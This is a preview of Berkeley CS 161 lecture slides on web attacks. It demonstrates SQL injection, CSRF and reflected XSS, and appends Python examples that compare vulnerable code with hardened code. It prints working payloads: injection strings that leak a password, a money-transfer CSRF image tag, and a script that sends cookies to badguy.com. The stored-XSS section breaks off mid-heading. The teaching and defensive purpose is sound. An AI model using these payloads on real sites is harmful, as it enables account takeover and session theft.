Berkeley COMPSCI 161 - Web Attacks

This preview shows page 1-2-3-24-25-26-27-49-50-51 out of 51 pages.

Web Attacks, con't
CS 161: Computer Security
Prof. Vern Paxson
TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin
http://inst.eecs.berkeley.edu/~cs161/
February 24, 2011

Announcements
• Guest lecture a week from Thursday (March 3rd), Prof. David Wagner
  – Correction: material will not be in scope for the Midterm
• My office hours the week of March 7th will be by appointment
• Homework #2 should be out by tonight, due in 1 week

Goals For Today
• Make previously discussed web attacks concrete
  – SQL injection
  – Cross-site request forgery (CSRF)
  – Reflected cross-site scripting (XSS)
• Illustrate additional web attacks
  – Stored XSS
  – Clickjacking
• … and discuss defenses

SQL Injection Scenario
• Suppose the web server front end stores the URL parameter "recipient" in the variable $recipient and then builds up a string with the following SQL query:

    $sql = "SELECT PersonID FROM Person WHERE Balance < 100 AND Username='$recipient' ";

• How can recipient cause trouble here?
  – How can we see anyone's account?

SQL Injection Scenario, con't

    WHERE Balance < 100 AND Username='$recipient' ";

• $recipient = foo' OR 1=1; --

    WHERE Balance < 100 AND Username='foo' OR 1=1; --' ";

• Precedence & "--" (comment) makes this:

    WHERE (Balance < 100 AND Username='foo') OR 1=1;

• Always true!

Demo Tools
• Bro: freeware network monitoring tool
  – Scriptable
  – Primarily designed for real-time intrusion detection
  – www.bro.ids.org
• Squigler
  – Cool "localhost" web site(s) (Python/SQLite)
  – Developed by Arel Cordero
  – Let me know if you'd like a copy to play with

Server code for posting a "squig" (the squig text is interpolated straight into the SQL statement):

    import sqlite3

    def post_squig(user, squig):
        if not user or not squig: return
        conn = sqlite3.connect(DBFN)
        c    = conn.cursor()
        c.executescript("INSERT INTO squigs VALUES ('%s', '%s', datetime('now'));"
                        % (user, squig))
        conn.commit()
        c.close()

What the server executes when dilbert posts the squig "don't contractions work?":

    INSERT INTO squigs VALUES(dilbert, 'don't contractions work?', date);

→ Syntax error: the apostrophe closes the string literal early.

What the server executes when the posted squig is ' || (select password from accounts where username='bob') || ' :

    INSERT INTO squigs VALUES(dilbert, '' || (select password from accounts where username='bob') || '', date);

• '' are empty string literals
• || is the concatenation operator; concatenation of a string S with the empty string is just S, so this is equivalent to:

    INSERT INTO squigs VALUES(dilbert, (select password from accounts where username='bob'), date);

• Value of the squig will be Bob's password!

Web Accesses w/ Side Effects
• Recall our earlier banking URL:

    http://mybank.com/moneyxfer.cgi?account=alice&amt=50&to=bob

• So what happens if we visit evilsite.com, which includes:

    <img src="http://mybank.com/moneyxfer.cgi?Account=alice&amt=500000&to=DrEvil">

• Cross-Site Request Forgery (CSRF) attack

URL fetch for posting a squig (a web action with a side effect):

    Request (to 127.0.0.1/8080): GET
        /do_squig?redirect=%2Fuserpage%3Fuser%3Ddilbert
        &squig=squigs+speak+a+deep+truth
    HOST: "localhost:8080"
    REFERER: "http://localhost:8080/userpage?user=dilbert"
    COOKIE: "session_id=5321506"

The request is authenticated with a cookie that the browser automatically sends along.

Subversive Script Execution: Cross-Site Scripting (XSS)
• Attacker's goal: cause the victim's browser to execute Javascript written by the attacker …
• … but with the browser believing that the script instead was sent by a trusted server, mybank.com
  – In order to circumvent the Same Origin Policy (SOP), which prevents the browser from letting Javascript received directly from evil.com have full access to content from mybank.com
• (Do not confuse with CSRF! CSRF is about web requests with side effects; XSS is about getting Javascript treated as though a trusted server sent it)

The Setup
• User input is echoed into the HTML response.
• Example: search field
  – http://victim.com/search.php?term=apple
  – search.php responds with:

    <HTML> <TITLE> Search Results </TITLE>
    <BODY>
    Results for <?php echo $_GET[term] ?> :
    . . .
    </BODY> </HTML>

• How can an attacker exploit this?

Injection Via Bad Input
• Consider this link (properly URL encoded):

    http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie = " + document.cookie ) </script>

• What if the user clicks on this link?
  1) Browser goes to victim.com/search.php
  2) victim.com returns <HTML> Results for <script> … </script> …
  3) Browser executes the script in the same origin as victim.com
     – Sends badguy.com the cookie for victim.com
     – Or any other arbitrary execution / rewrite of the victim.com page

Demo on (1) Finding and (2) Exploiting Reflected XSS vulnerabilities

Cross-Site Scripting (XSS): the sequence of steps between the Attack Server, the Victim client and the Server Patsy/Victim, built up over several slides:
  1) Victim client visits the attacker's web site
  2) Victim client receives the malicious page
  3) Victim client clicks on a link to the Server Patsy/Victim (exact URL under the attacker's control)
  4) Server Patsy/Victim echoes the user input back to the Victim client
  5) Victim client executes the script embedded in the input as though the server meant us to run it
  6) … and performs the attacker's action
  7) and/or sends valuable data to the Attack Server
("Reflected" XSS attacks)

Stored Cross-Site Scripting (Attack Server, Server Patsy/Victim):
  1) Attack Server injects a malicious script into the Server Patsy/Victim
Stored Cross-Site
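To make the post_squig discussion concrete, here is an added example (not the lecture's Squigler code) that runs the slides' two squigs through the string-formatting pattern and through a parameterised rewrite, using a constructed in-memory SQLite schema standing in for the squigs and accounts tables:

```python
import sqlite3

DBFN = ":memory:"  # constructed: a throwaway in-memory database so this runs offline
# The injected squig from the lecture: closes the '' literal, splices in a subquery, reopens it
INJECTED_SQUIG = "' || (select password from accounts where username='bob') || '"

def make_db():
    """Constructed schema standing in for Squigler's squigs/accounts tables."""
    conn = sqlite3.connect(DBFN)
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE squigs (user TEXT, squig TEXT, ts TEXT)")
    conn.execute("INSERT INTO accounts VALUES ('bob', 'hunter2')")  # constructed sample secret
    conn.commit()
    return conn

def post_squig_unsafe(conn, user, squig):
    """The slides' pattern: squig text is pasted into the SQL, so quotes in it change the query."""
    conn.cursor().executescript(
        "INSERT INTO squigs VALUES ('%s', '%s', datetime('now'));" % (user, squig))
    conn.commit()

def post_squig_safe(conn, user, squig):
    """Hardened form: bound parameters keep the squig as data, and execute() runs one statement only."""
    if not user or not squig: return
    conn.execute("INSERT INTO squigs VALUES (?, ?, datetime('now'))", (user, squig))
    conn.commit()

def last_squig(conn):
    return conn.execute("SELECT squig FROM squigs ORDER BY rowid DESC LIMIT 1").fetchone()[0]

def subquery_case():
    """Returns (what the unsafe path stored, what the safe path stored) for the injected squig."""
    conn = make_db()
    post_squig_unsafe(conn, "dilbert", INJECTED_SQUIG)
    leaked = last_squig(conn)  # Bob's password: the subquery ran inside the INSERT
    post_squig_safe(conn, "dilbert", INJECTED_SQUIG)
    return leaked, last_squig(conn)  # the literal text; the subquery never executed

def apostrophe_case():
    """The slides' "don't contractions work?" squig: a syntax error when pasted in, stored verbatim when bound."""
    conn = make_db()
    text = "don't contractions work?"
    try:
        post_squig_unsafe(conn, "dilbert", text)
        unsafe_failed = False
    except sqlite3.OperationalError:
        unsafe_failed = True
    post_squig_safe(conn, "dilbert", text)
    return unsafe_failed, last_squig(conn)
```

Note that executescript() also accepts several statements separated by semicolons, so the unsafe path would run anything appended after the INSERT; execute() with bound parameters refuses that as well.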
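For the search.php setup, here is an added example (not the lecture's code) that reconstructs what $_GET[term] receives from the URL-encoded link and compares echoing it raw, as the slide does, with HTML-escaping it first; the template text and the badguy.com payload are copied from the slides, everything else is assumed:

```python
import html
from urllib.parse import quote, urlsplit, parse_qs

# The lecture's payload, and the "properly URL encoded" link carrying it
PAYLOAD = '<script> window.open("http://badguy.com?cookie = " + document.cookie ) </script>'
XSS_LINK = "http://victim.com/search.php?term=" + quote(PAYLOAD)

# Same shape as the slide's search.php response; {term} is where $_GET[term] is echoed
TEMPLATE = ("<HTML> <TITLE> Search Results </TITLE>\n<BODY>\n"
            "Results for {term} :\n. . .\n</BODY> </HTML>")

def term_from_url(url):
    """What search.php sees in $_GET[term] once the browser has sent the link."""
    return parse_qs(urlsplit(url).query).get("term", [""])[0]

def render_unsafe(term):
    """Mirrors the slide: the term goes into the HTML untouched, so tags in it become tags."""
    return TEMPLATE.format(term=term)

def render_safe(term):
    """Hardened: escape < > & " ' before echoing, so the input stays text in the page."""
    return TEMPLATE.format(term=html.escape(term, quote=True))

def has_script_tag(page):
    """Crude check on the rendered page: does it contain a live <script> tag?"""
    return "<script>" in page.lower()
```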

